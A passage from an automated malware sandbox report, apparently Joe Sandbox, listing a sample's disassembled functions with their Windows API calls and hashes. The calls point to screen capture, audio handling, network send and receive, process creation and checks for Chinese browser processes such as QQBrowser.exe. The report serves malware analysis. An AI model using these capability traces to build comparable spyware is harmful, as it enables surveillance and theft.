                                Function 033161F4 Relevance: 16.6, APIs: 11, Instructions: 146sleepfilememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 03316248
                                • Sleep.KERNEL32(000001F4), ref: 0331625E
                                • GetLastError.KERNEL32 ref: 0331627A
                                • wsprintfA.USER32 ref: 0331628E
                                • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 03316306
                                • LocalAlloc.KERNEL32(00000040,00002000), ref: 0331631D
                                • ReadFile.KERNEL32(?,00000009,00001FF7,00000000,00000000), ref: 03316351
                                • LocalFree.KERNEL32(00000000,00000000,-00000009), ref: 03316387
                                • Sleep.KERNEL32(00000032), ref: 03316398
                                • LocalFree.KERNEL32(00000000), ref: 033163C3
                                • CloseHandle.KERNEL32(?), ref: 033163CF
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileLocal$FreeSleep$AllocCloseCreateErrorHandleLastPointerReadwsprintf
                                • String ID:
                                • API String ID: 623555137-0
                                • Opcode ID: 2f2970c4e608f136ddf3b8aa8b4e3086cafe0cc2dfb1f0e5cb77d04bb49ab0fb
                                • Instruction ID: 09e4211821fcdb37ddf09ea8d6790c4d7ff2fb3a0b1bcac59992f5075d8be6da
                                • Opcode Fuzzy Hash: 2f2970c4e608f136ddf3b8aa8b4e3086cafe0cc2dfb1f0e5cb77d04bb49ab0fb
                                • Instruction Fuzzy Hash: F251B5B5A002289FDB14DF64CCC5BA9BBB9EF05300F0581E9EB09DB291DB709995CF54
                                Function 033170B4 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 247stringsynchronizationthreadCOMMON
                                Download Yara Rule
                                APIs
                                • SetEvent.KERNEL32(?,10081068), ref: 03317101
                                • WaitForSingleObject.KERNEL32(?,000000FF,10081068), ref: 03317124
                                • CloseHandle.KERNEL32(?), ref: 0331712D
                                • lstrcpy.KERNEL32(?,?), ref: 033171AD
                                • CreateThread.KERNEL32(00000000,00000000,100253E0,?,00000000,00000000), ref: 03317227
                                • waveOutGetNumDevs.WINMM ref: 033172BF
                                • waveOutOpen.WINMM(?,0000FFFF,?,00000001,00000001,00000001,?), ref: 0331730B
                                • waveOutPrepareHeader.WINMM(?,?,00000020), ref: 0331734C
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$CloseCreateDevsEventHandleHeaderObjectOpenPrepareSingleThreadWaitlstrcpy
                                • String ID: N/A@
                                • API String ID: 764069715-4129345051
                                • Opcode ID: d924b75e51b260a3094ff80434e961c2657ff71e2e11ec36fbebfb09547744b5
                                • Instruction ID: ef749770ba26482a95e79d23eb4c3d32425fcc4f8a73e5ee2495614b05769307
                                • Opcode Fuzzy Hash: d924b75e51b260a3094ff80434e961c2657ff71e2e11ec36fbebfb09547744b5
                                • Instruction Fuzzy Hash: E0A1C271A007189FDB24CF64CC84B9ABBB9FF09310F0445A9EA59EB281D771EA55CF90
                                Function 03315694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 198processstringCOMMON
                                Download Yara Rule
                                APIs
                                • _strrchr.LIBCMT ref: 033156C4
                                • _strrchr.LIBCMT ref: 033156EC
                                • wsprintfA.USER32 ref: 033157A5
                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 03315815
                                • _strstr.LIBCMT ref: 03315827
                                • _strstr.LIBCMT ref: 0331583F
                                • lstrcpy.KERNEL32(00000000), ref: 0331586D
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 03315906
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: _strrchr_strstr$CreateEnvironmentExpandProcessStringslstrcpywsprintf
                                • String ID: D
                                • API String ID: 4149003945-2746444292
                                • Opcode ID: 1821280df13603b5a307207725d0e8fec229da61c0a7d5f899d880cde0247230
                                • Instruction ID: ee5ae129509c7725a70e880d8888a9eb3eb4c534142cbc73256fbc8c0c281144
                                • Opcode Fuzzy Hash: 1821280df13603b5a307207725d0e8fec229da61c0a7d5f899d880cde0247230
                                • Instruction Fuzzy Hash: AD61CA75D4072DA7EB24DB60CCC5FEA777DAF49705F4401D9F609A6180EAB097848F50
                                Function 03316004 Relevance: 15.2, APIs: 10, Instructions: 164stringsleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 03316056
                                • Sleep.KERNEL32(000001F4), ref: 0331606C
                                • GetLastError.KERNEL32 ref: 03316088
                                • wsprintfA.USER32 ref: 0331609C
                                • GetFileSize.KERNEL32(00000000,?), ref: 0331612E
                                • CloseHandle.KERNEL32(00000000), ref: 0331613B
                                • lstrlen.KERNEL32(?), ref: 03316142
                                • LocalAlloc.KERNEL32(00000040,-0000000A), ref: 03316154
                                • lstrlen.KERNEL32(?), ref: 033161A3
                                • LocalFree.KERNEL32(?,00000000,?), ref: 033161CE
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileLocallstrlen$AllocCloseCreateErrorFreeHandleLastSizeSleepwsprintf
                                • String ID:
                                • API String ID: 3807812993-0
                                • Opcode ID: 34097d96cae529cfb7cc7b4375c1f94a29db3fa3dd608a12446bf275b73c520f
                                • Instruction ID: 30335f6d06ecf26d1e4c3ea2c31ac219fdd4a2caa55f1c236a2e5daa4625b821
                                • Opcode Fuzzy Hash: 34097d96cae529cfb7cc7b4375c1f94a29db3fa3dd608a12446bf275b73c520f
                                • Instruction Fuzzy Hash: 495139B6D002286BDB20DF608CC4FAEBBA9EF45300F0141B9FB05E7241DA715954CBA5
                                Function 0331C074 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 83stringCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: _strstr$ComputerNamelstrcpywsprintf
                                • String ID: Disable$Enable
                                • API String ID: 296541848-1261744749
                                • Opcode ID: 4f15b3797606465dcc81d2cc8d45783cba65aeeab17db4cd74e7a1a11c688326
                                • Instruction ID: 468dc031c37a3475c38b741cbcdecdd8fcf2e9a766f72127d2feab0cf0504a15
                                • Opcode Fuzzy Hash: 4f15b3797606465dcc81d2cc8d45783cba65aeeab17db4cd74e7a1a11c688326
                                • Instruction Fuzzy Hash: 6C21F7B5D803187BEF10EBA08C8AFEE7769AF01700F5054D5F709AB181EF755A648B54
                                Function 0332055A Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62windowCOMMON
                                Download Yara Rule
                                APIs
                                • ScreenToClient.USER32(00000000,?), ref: 033204F5
                                • ChildWindowFromPoint.USER32(00000000,?,?), ref: 03320504
                                • ScreenToClient.USER32(00000000,?), ref: 03320520
                                • ChildWindowFromPoint.USER32(00000000,?,?), ref: 0332052F
                                • GetWindowPlacement.USER32(?,?), ref: 0332056E
                                • PostMessageA.USER32(00000000,?,?,?), ref: 033207AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$ChildClientFromPointScreen$MessagePlacementPost
                                • String ID: ,
                                • API String ID: 3925113155-3772416878
                                • Opcode ID: 2571cdf8367a0963a67ebd36e79b76d118e18b1f79c451ec09e3f79dffa9483e
                                • Instruction ID: d30447048af70f66421629f0d7af312efb21c777d1fdb382daca9a7f035b6c7d
                                • Opcode Fuzzy Hash: 2571cdf8367a0963a67ebd36e79b76d118e18b1f79c451ec09e3f79dffa9483e
                                • Instruction Fuzzy Hash: 89116D72008625AFE326DB64CC89FBFBAEAEB88711F054509F68682151CF748549DB62
                                Function 033180A4 Relevance: 12.2, APIs: 8, Instructions: 197sleepmemorysynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,10081068), ref: 033180FA
                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000), ref: 03318130
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0331813B
                                • Sleep.KERNEL32(00000096), ref: 03318146
                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?), ref: 03318174
                                • GetSystemMetrics.USER32(00000050), ref: 033181C2
                                • EnumDisplayMonitors.USER32(00000000,00000000,10026010,00000000), ref: 033181FF
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocDisplayEnumFreeMetricsMonitorsObjectSingleSleepSystemWait
                                • String ID:
                                • API String ID: 2383587994-0
                                • Opcode ID: ff364214429d5b944b4ce329c9e560beb329ece42a251403d0e64f130108721a
                                • Instruction ID: bdf836b9884fe88ad3ad5e7e2057973c12273bd37ffe484ffbf877ad7a415063
                                • Opcode Fuzzy Hash: ff364214429d5b944b4ce329c9e560beb329ece42a251403d0e64f130108721a
                                • Instruction Fuzzy Hash: 9A71C135A00614AFEB15DF64CCC0F5ABBB5FF48710F098269ED09AF291DB70A851CBA0
                                Function 033176A4 Relevance: 12.2, APIs: 8, Instructions: 152threadsleeplibraryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,10081068), ref: 033176F4
                                • LoadCursorA.USER32(00000000,?), ref: 0331774F
                                • Sleep.KERNEL32(00000001,00000008,00000000,?), ref: 033177AA
                                • LoadLibraryA.KERNEL32(10078790), ref: 033177CE
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0331781C
                                • CreateThread.KERNEL32(00000000,00000000,10030AC0,10026080,00000000,00000000), ref: 03317836
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 03317872
                                • CreateThread.KERNEL32(00000000,00000000,10030AC0,10026310,00000000,00000000), ref: 0331788C
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$Event$LoadThread$CursorLibrarySleep
                                • String ID:
                                • API String ID: 4260334496-0
                                • Opcode ID: 0c39f22e401902902f7f8e9c0af3c7de2d8d42615119ec5fd189c1008c74e364
                                • Instruction ID: 3a06d193b1f51473fd9360d739e794d7998fc53c8048d86c548097b46e83c51e
                                • Opcode Fuzzy Hash: 0c39f22e401902902f7f8e9c0af3c7de2d8d42615119ec5fd189c1008c74e364
                                • Instruction Fuzzy Hash: 71617E71944358EFFB00CFA4CC85B99BBB1FF08704F154269EA09AF291DBB55984CB50
                                Function 0331B034 Relevance: 12.1, APIs: 8, Instructions: 134filememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(1008C3A0,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000), ref: 0331B05F
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0331B075
                                • CloseHandle.KERNEL32(00000000), ref: 0331B082
                                • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0331B0B9
                                • ReadFile.KERNEL32(?,00000000,00002004,?,00000000), ref: 0331B0DF
                                • LocalAlloc.KERNEL32(00000040,00002005), ref: 0331B163
                                • LocalFree.KERNEL32(00000000,00000000,00002005), ref: 0331B18D
                                • CloseHandle.KERNEL32(?), ref: 0331B19F
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandleLocal$AllocCreateFreePointerReadSize
                                • String ID:
                                • API String ID: 1977366500-0
                                • Opcode ID: c38b8c9c94c7ce435ac1a4fbd388347041662893612b13b9d31d9a6673acd3be
                                • Instruction ID: 020cdfbf7907f2147ac8838c6cc6d988a2a4c02908e9d91ec70a1134fe4424c3
                                • Opcode Fuzzy Hash: c38b8c9c94c7ce435ac1a4fbd388347041662893612b13b9d31d9a6673acd3be
                                • Instruction Fuzzy Hash: E6415632C00B54A7E722CB39CCC6BAAFBA9EF96254F054365FE46A7152DB30A5908650
                                Function 0331D6D4 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 316memoryCOMMON
                                Download Yara Rule
                                APIs
                                • LocalAlloc.KERNEL32(00000040,00000400), ref: 0331D72F
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocLocal
                                • String ID: error
                                • API String ID: 3494564517-1574812785
                                • Opcode ID: 70138bbad4e0ae2633d026867218b703bec755c2109b8334526132e00d72a23d
                                • Instruction ID: ce0bbbb0705663e83f244d0643c7ee2bd769019bfae3e76052b4b5ca7288ca62
                                • Opcode Fuzzy Hash: 70138bbad4e0ae2633d026867218b703bec755c2109b8334526132e00d72a23d
                                • Instruction Fuzzy Hash: 4BC12EB6D00628ABDB60DB60CC84FEFBBBDAF05306F0401D5E649E6141EA749BD58F54
                                Function 033252B4 Relevance: 10.7, APIs: 7, Instructions: 157networkCOMMON
                                Download Yara Rule
                                APIs
                                • select.WS2_32(00000000,00000001,00000000,00000000,00000000), ref: 03325359
                                • recv.WS2_32(?,?,00002000,00000000), ref: 03325384
                                • ioctlsocket.WS2_32(?,8004667E,?), ref: 033253AF
                                • send.WS2_32(?,?,00000000,00000000), ref: 033253C2
                                • recv.WS2_32(?,?,00002000,00000000), ref: 0332540F
                                • ioctlsocket.WS2_32(?,8004667E,?), ref: 0332543C
                                • send.WS2_32(?,?,00000000,00000000), ref: 03325451
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: ioctlsocketrecvsend$select
                                • String ID:
                                • API String ID: 1327307048-0
                                • Opcode ID: cfec5d6c11ebae482d8edf7ec5993ef7642d13e32df610307e2b5908f50ada61
                                • Instruction ID: 69e25b574a14fb1f3ce0098a93e7ad2bd1ec2caf0c879fc6bd8968f50b5e955f
                                • Opcode Fuzzy Hash: cfec5d6c11ebae482d8edf7ec5993ef7642d13e32df610307e2b5908f50ada61
                                • Instruction Fuzzy Hash: BD5140719002389BFB20CB658CC9BE9FBBEAB55601F1940D5EA09E7241DB709A94CF91
                                Function 03334610 Relevance: 9.3, APIs: 6, Instructions: 285COMMON
                                Download Yara Rule
                                APIs
                                • __allrem.LIBCMT ref: 0333479A
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 033347B6
                                • __allrem.LIBCMT ref: 033347CD
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 033347EB
                                • __allrem.LIBCMT ref: 03334802
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03334820
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                • Opcode ID: 5a632a87e7081925c05750c335bdd88a943fbf03be889ba1cf27fc3701b1fcbd
                                • Instruction ID: e57bd06d8acb84c564075cbbb2df09b2afc6efb98ca250c8a4a877d6fa1a363e
                                • Opcode Fuzzy Hash: 5a632a87e7081925c05750c335bdd88a943fbf03be889ba1cf27fc3701b1fcbd
                                • Instruction Fuzzy Hash: D0811876E007069BE724EF6ACCC0B6AB3EDEF46625F18C629F510DB680E771D9008B50
                                Function 033100B4 Relevance: 9.1, APIs: 6, Instructions: 118COMMON
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 033100F4
                                • std::_Lockit::_Lockit.LIBCPMT ref: 03310116
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 03310136
                                • __Getctype.LIBCPMT ref: 033101CF
                                • std::_Facet_Register.LIBCPMT ref: 033101EE
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 03310206
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                • String ID:
                                • API String ID: 1102183713-0
                                • Opcode ID: 681ceeaaed8dc5f2c49d00f6d9b9152a8584b6e4d5aeae72a770ffeea55858ee
                                • Instruction ID: e74f48334ba46a43d30a7ab1cc880e539f021c8172602cc19fe9784de61c4e4d
                                • Opcode Fuzzy Hash: 681ceeaaed8dc5f2c49d00f6d9b9152a8584b6e4d5aeae72a770ffeea55858ee
                                • Instruction Fuzzy Hash: B341B075E003189BDB19DF58CDC0BAABBF8FB04610F1481AAD845AB391DB34A955CBC1
                                Function 032FD055 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32 ref: 032FD07F
                                • SysFreeString.OLEAUT32(00000000), ref: 032FD0D8
                                • _com_issue_error.COMSUPP ref: 032FD172
                                • _com_issue_error.COMSUPP ref: 032FD17C
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 032FD197
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 032FD1B2
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8StringThrow_com_issue_error$AllocFree
                                • String ID:
                                • API String ID: 257066983-0
                                • Opcode ID: 061e9250fa514ae9ce0a29f90aefa8f30a48181917d89580633c9d881ef431e1
                                • Instruction ID: cf10a06de2838ebc9e2125cdd6c2bd8f766477068c774e44a4bf488ac74554ec
                                • Opcode Fuzzy Hash: 061e9250fa514ae9ce0a29f90aefa8f30a48181917d89580633c9d881ef431e1
                                • Instruction Fuzzy Hash: 1031B375E50315AFE720EB64CC95F8AFBA49F00B14F24806DFA45BB2C0DBB5A540CB55
                                Function 03312674 Relevance: 9.1, APIs: 6, Instructions: 100libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNEL32(100782C8), ref: 0331268F
                                • LoadLibraryW.KERNEL32(10077444), ref: 033126C2
                                • GetProcAddress.KERNEL32(00000000,10077470), ref: 033126D0
                                • LoadLibraryW.KERNEL32(100784DC), ref: 0331272F
                                • GetProcAddress.KERNEL32(00000000,100784F8), ref: 0331273B
                                • CloseHandle.KERNEL32(?), ref: 03312755
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$AddressProc$CloseHandle
                                • String ID:
                                • API String ID: 3524107332-0
                                • Opcode ID: f27283c8d3662551119074e06093de2561d3dcfda475ecca768fe5d26826f0af
                                • Instruction ID: 17b0871ea7f7c2f7074760f25c7b3c3a53c2386c3b7cfe07ef9f717b13b9aa33
                                • Opcode Fuzzy Hash: f27283c8d3662551119074e06093de2561d3dcfda475ecca768fe5d26826f0af
                                • Instruction Fuzzy Hash: 64314471E4021AABEB10EBF5CC85EFFBBB9EB48611F114065FA05E7140DF7859448B64
                                Function 03319055 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0331A244: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0331A25F
                                  • Part of subcall function 0331A244: Process32First.KERNEL32(00000000,00000128), ref: 0331A279
                                  • Part of subcall function 03318E24: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 03318E45
                                  • Part of subcall function 03318E24: lstrcpy.KERNEL32(1008E080,00000000), ref: 03318E95
                                • wsprintfA.USER32 ref: 03319083
                                  • Part of subcall function 0331A3C4: FindFirstFileA.KERNEL32(00000000,?), ref: 0331A47A
                                  • Part of subcall function 03319384: LocalSize.KERNEL32(00000000), ref: 03319395
                                  • Part of subcall function 03319384: LocalFree.KERNEL32(00000000,00000000,00000000,?,?,?,033191BA), ref: 033193A5
                                • EnumWindows.USER32(10027C20,?), ref: 033192E5
                                • LocalSize.KERNEL32(00000000), ref: 033192FF
                                • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 0331930F
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$FirstFreeSize$CreateEnumFileFindFolderPathProcess32SnapshotSpecialToolhelp32Windowslstrcpywsprintf
                                • String ID: 360se.exe
                                • API String ID: 1909023841-316614572
                                • Opcode ID: 242b868c74da103769033bd66f21e5e660b74f51ed33d585facd5956f5228bbc
                                • Instruction ID: cf890933eb64a58642dc65dbcc22c621bb2b35ac8350a6a3d2000ff83689f484
                                • Opcode Fuzzy Hash: 242b868c74da103769033bd66f21e5e660b74f51ed33d585facd5956f5228bbc
                                • Instruction Fuzzy Hash: B311E335A043106FD248EBA4CCD4BAFB799EF84210F09481AF9459B2D0DF74D5158BA3
                                Function 03319108 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0331A244: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0331A25F
                                  • Part of subcall function 0331A244: Process32First.KERNEL32(00000000,00000128), ref: 0331A279
                                  • Part of subcall function 03318E24: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 03318E45
                                  • Part of subcall function 03318E24: lstrcpy.KERNEL32(1008E080,00000000), ref: 03318E95
                                • wsprintfA.USER32 ref: 03319136
                                  • Part of subcall function 0331A3C4: FindFirstFileA.KERNEL32(00000000,?), ref: 0331A47A
                                  • Part of subcall function 03319384: LocalSize.KERNEL32(00000000), ref: 03319395
                                  • Part of subcall function 03319384: LocalFree.KERNEL32(00000000,00000000,00000000,?,?,?,033191BA), ref: 033193A5
                                • EnumWindows.USER32(10027C20,?), ref: 033192E5
                                • LocalSize.KERNEL32(00000000), ref: 033192FF
                                • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 0331930F
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$FirstFreeSize$CreateEnumFileFindFolderPathProcess32SnapshotSpecialToolhelp32Windowslstrcpywsprintf
                                • String ID: SogouExplorer.exe
                                • API String ID: 1909023841-511930238
                                • Opcode ID: 4917241e9177828214f7f8670e5bd07157e59a0168bd981aa8d54f77c58822ff
                                • Instruction ID: 1235075996615bf7406a2deb55336e9595ae38831053bdbd5c014a92e43bb6c1
                                • Opcode Fuzzy Hash: 4917241e9177828214f7f8670e5bd07157e59a0168bd981aa8d54f77c58822ff
                                • Instruction Fuzzy Hash: BE114831A043106FD308EBA48CD4BAFB79AEF84210F09881AF9859B2D0DF74D5118BA3
                                Function 0331915B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0331A244: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0331A25F
                                  • Part of subcall function 0331A244: Process32First.KERNEL32(00000000,00000128), ref: 0331A279
                                  • Part of subcall function 03318E24: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 03318E45
                                  • Part of subcall function 03318E24: lstrcpy.KERNEL32(1008E080,00000000), ref: 03318E95
                                • wsprintfA.USER32 ref: 03319189
                                  • Part of subcall function 0331A3C4: FindFirstFileA.KERNEL32(00000000,?), ref: 0331A47A
                                  • Part of subcall function 03319384: LocalSize.KERNEL32(00000000), ref: 03319395
                                  • Part of subcall function 03319384: LocalFree.KERNEL32(00000000,00000000,00000000,?,?,?,033191BA), ref: 033193A5
                                • EnumWindows.USER32(10027C20,?), ref: 033192E5
                                • LocalSize.KERNEL32(00000000), ref: 033192FF
                                • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 0331930F
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$FirstFreeSize$CreateEnumFileFindFolderPathProcess32SnapshotSpecialToolhelp32Windowslstrcpywsprintf
                                • String ID: 360chrome.exe
                                • API String ID: 1909023841-422476515
                                • Opcode ID: cd3c41885da290c31c9bd3f3251aa54bc81fd1afe1ea2a4cd9a4b7e367e8b696
                                • Instruction ID: ef79c45fca95855a7bb9bfd33cf5ec9d75339213e680a98f97f14b502a2e072a
                                • Opcode Fuzzy Hash: cd3c41885da290c31c9bd3f3251aa54bc81fd1afe1ea2a4cd9a4b7e367e8b696
                                • Instruction Fuzzy Hash: 99110C35A043106FD318FB648CD4BAFB799DF84614F09881AF9459B2D0DF74D5158BA3
                                Function 033190B5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0331A244: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0331A25F
                                  • Part of subcall function 0331A244: Process32First.KERNEL32(00000000,00000128), ref: 0331A279
                                  • Part of subcall function 03318E24: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 03318E45
                                  • Part of subcall function 03318E24: lstrcpy.KERNEL32(1008E080,00000000), ref: 03318E95
                                • wsprintfA.USER32 ref: 033190E3
                                  • Part of subcall function 0331A3C4: FindFirstFileA.KERNEL32(00000000,?), ref: 0331A47A
                                  • Part of subcall function 03319384: LocalSize.KERNEL32(00000000), ref: 03319395
                                  • Part of subcall function 03319384: LocalFree.KERNEL32(00000000,00000000,00000000,?,?,?,033191BA), ref: 033193A5
                                • EnumWindows.USER32(10027C20,?), ref: 033192E5
                                • LocalSize.KERNEL32(00000000), ref: 033192FF
                                • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 0331930F
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$FirstFreeSize$CreateEnumFileFindFolderPathProcess32SnapshotSpecialToolhelp32Windowslstrcpywsprintf
                                • String ID: QQBrowser.exe
                                • API String ID: 1909023841-4144352637
                                • Opcode ID: 3314358a5031b85a8a43de4ad9b278f8bac00cd9504b336f40623512fedec271
